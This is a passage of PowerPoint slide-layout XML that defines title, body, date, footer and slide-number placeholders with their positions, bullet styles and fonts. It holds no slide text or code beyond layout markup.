                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Shape 89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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0" name="Shape 90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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1" name="Shape 91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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 name="Shape 24"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buFont typeface="Impact"/>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txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="3886200" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" rtl="0" indent="-137159" marL="594360">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr algn="l" rtl="0" indent="-106680" marL="868680">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0" indent="-114300" marL="1143000">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0" indent="-114300" marL="1371600">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr algn="l" rtl="0" indent="-134620" marL="1645920">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr algn="l" rtl="0" indent="-136651" marL="1901951">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr algn="l" rtl="0" indent="-137160" marL="2194560">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr algn="l" rtl="0" indent="-132079" marL="2468880">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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8" name="Shape 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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9" name="Shape 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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0" name="Shape 30"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="0" x="777239"/>
            <a:ext cy="3048000" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="1800" i="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3276600" x="762000"/>
            <a:ext cy="1676399" cx="7543800"/>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1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4953000" x="762000"/>
            <a:ext cy="914400" cx="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr rtl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr rtl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr rtl="0" indent="0" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr rtl="0" indent="0" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr rtl="0" indent="0" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr rtl="0" indent="0" marL="2743200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr rtl="0" indent="0" marL="3200400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr rtl="0" indent="0" marL="3657600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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5" name="Shape 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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6" name="Shape 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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7" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6172200" x="777239"/>
            <a:ext cy="27431" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="1800" i="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8" name="Shape 38"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buFont typeface="Impact"/>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1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="609600" x="762000"/>
            <a:ext cy="3767328" cx="3657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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="609600" x="4648200"/>
            <a:ext cy="3767328" cx="3657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2" name="Shape 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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3" name="Shape 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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4" name="Shape 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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5" name="Shape 45"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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7" name="Shape 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="609600" x="758952"/>
            <a:ext cy="639762" cx="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr rtl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr rtl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr rtl="0" indent="0" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr rtl="0" indent="0" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr rtl="0" indent="0" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr rtl="0" indent="0" marL="2743200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr rtl="0" indent="0" marL="3200400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr rtl="0" indent="0" marL="3657600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1329263" x="758952"/>
            <a:ext cy="3048000" cx="36576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9" name="Shape 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="609600" x="4645151"/>
            <a:ext cy="639762" cx="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr rtl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr rtl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr rtl="0" indent="0" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr rtl="0" indent="0" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr rtl="0" indent="0" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr rtl="0" indent="0" marL="2743200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr rtl="0" indent="0" marL="3200400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr rtl="0" indent="0" marL="3657600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Shape 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1329263" x="4645151"/>
            <a:ext cy="3048000" cx="36576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1" name="Shape 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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2" name="Shape 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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3" name="Shape 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Shape 54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1249362" x="758952"/>
            <a:ext cy="1587" cx="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="med" len="med" type="none"/>
            <a:tailEnd w="med" len="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="55" name="Shape 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1249362" x="4645151"/>
            <a:ext cy="1587" cx="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="med" len="med" type="none"/>
            <a:tailEnd w="med" len="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6" name="Shape 56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buFont typeface="Impact"/>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8" name="Shape 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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9" name="Shape 59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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0" name="Shape 60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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1" name="Shape 61"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="62484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3" name="Shape 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208776" x="761999"/>
            <a:ext cy="365125" cx="4873868"/>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4" name="Shape 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5687567" x="7620000"/>
            <a:ext cy="365125" cx="76200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5" name="Shape 65"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
